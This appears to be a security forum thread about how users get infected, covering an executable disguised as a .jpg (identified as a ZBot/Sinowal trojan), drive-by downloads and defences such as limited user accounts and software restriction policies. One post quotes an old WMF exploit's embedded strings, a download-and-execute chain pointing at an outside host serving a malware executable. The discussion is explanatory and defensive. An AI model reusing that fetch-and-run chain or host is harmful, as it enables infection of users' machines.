ABC of how people easily get infected

In an .exe for sure

Definately.

I still don't know what the ban00.jpg detect facts are. No .jpg showed up when i visited the www. The www is still live with the same MZ code as i just tested it with IE6 I'm going to email them and let them know

I looks like "some" kind of spoofing is happening !

 

Surly a delight to read this thread indeed...

 

CONFIRMED Nasty

ban00.jpg is 100% malware as i expected it was, and the earlier analysis indicated. Grabbed it out of my cache, 177 kbytes, and uploaded it to VT.



Result: 37/42 (88.10%) It's a nasty ZBot/Sinowal type Trojan Spy

The interesting thing is, it's extension is .jpg so it is spoofed as one, but it actually is an .exe Not sure how they expected it would run as it is

I did email the company, so we might hear something soon.

 

It can't be run by the user who downloads directly because Window File Associations will call the user's default applications for .jpg, which will generate an error message.

Please see my post #22 above.

It's only a guess in this case, but often these spoofed executables sit on a server somewhere to be called in a remote code execution exploit.

Here is an old one, where the spoofed file extension is .gif:

http://www.urs2.net/rsj/computing/tests/redirect


----
rich

 

Indeed

I had considered that, good point

Nice example

Havn't heard back from Hollywood yet ? I'm ready for my close up Mr. Damille

Edit - It's still got the nasty on it

 

Yet another way the user can be easily infected:

http://www.wired.com/wired/archive/14.06/start.html?pg=6

 

Originally Posted by ABee

Funny as it sounds, lots of people are click happy and just don't have a clue, which is why they not only get infected, but keep on doing so

 

I've seen experienced people say things like, "Oh that site is okay, I go there all the time", when in fact it isn't okay. My only conclusion then, is that sometimes it doesn't matter how much one knows (or how much one thinks one knows), there is an ever-present danger of infection no matter which sites you visit, and no matter how many times you have visited them before without a problem.

 

Sure. Also why 20% of users are carrying around 90% of the infections. (IMO, and just to use some numbers pulled out of a hat.)

 

Thanks. Reading the analysis, it seems that the download of the gif file, the renaming to exe, and starting of the exe file is all done automatically. Is that correct?
So visiting the infected site is all that takes? I had been under the impression that the user had to intervene for the virus/trojan to get installed.
PS: In the test above, what blocked the download? Windows or a third party software?



Regarding infected media files: say the user has a policy of always doing right click and doing "open by"; and then never downloading from any pop-ups etc.
Does this strategy protect against all media malware?

 

Yes.

When a user visits a site that has a drive-by download, either the browser or a 3rd party application, such as a PDF reader, must have a vulnerability that can be exploited. If all conditions are met, then no user intervention is necessary.

Third party software -- several years ago I used this exploit as a test and several people tested various solutions, including the one I used above, Faronics Anti-Executable.

http://www.urs2.net/rsj/computing/tests/remote/

I use the word "solution" because Software Restriction Policies is not a product, but part of the Operating System. There are many newer solutions/products since I tested those, that provide the same protection.

I've never seen an infected media file exploit in the wild to test, so I cannot answer your question.

Do you know of one?

regards,

rich

 

No, I do not; but I do not have much experience with security issues.

 

Perhaps you are referring to exploits that use media files as a trigger to download malware.

An old remote code execution exploit used a .wmf file. Code was inserted into the file to download the malware:

Code:

GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec- 
[COLOR="DarkRed"]HTTP://195.225.177.33/vx/win32.exe[/COLOR]

So, the .wmf file is not the malware itself, rather, just a file that triggers the exploit.

PDF files work the same way. Here is similar code in a PDF file:



REFERENCES

Microsoft Windows GDI WMF File Handling Buffer Overflow Vulnerability
http://tools.cisco.com/security/center/viewAlert.x?alertId=17157
December 09, 2008

Adobe Flash zero-day attack
http://www.zdnet.com/blog/security/...k-underway-harden-pdf-reader-immediately/3773

Being a remote code execution exploit, running as LUA or having execution protection such as SRP or 3rd party product, nullifies the exploit because the malware cannot execute on the victim's machine.


----
rich

 

I think the Pareto principle has 20% and 80%

 

Yep, sounds about right.

I'd never heard of that one. Thanks for the info.
So I looked it up on Wikipedia and got this quote:

Which no doubt holds basically true for Windows security patches as well.
Install the 15, 20, or 25% most 'important' ones (or whatever word you prefer to use), and you've put the kibosh on a pretty large majority of exploit vulnerabilities.

I and many others have noted here and elsewhere how doing just three simple things-- getting behind a router, keeping patches up to date, and surfing from a LUA-- will vastly help reduce exposure to malware exploitations.
Obviously, there are many other things the user can also do to mollify exploit exposure, but just those three things by themselves represent a goodly portion of an effective defense.
Yet so many are either unwilling to put forth that little effort, or uneducated as to how important/necessary/effective it is.

C'est la vie.

 

Thanks Rich, that anwsers my question. "Open by" ... procedure does not protect.

I also found this to be useful(taken from Pedro's post):
http://www.uzipaz.com/eng/safe.html

 

Just tried to load the site and it doesnt load

 

What site?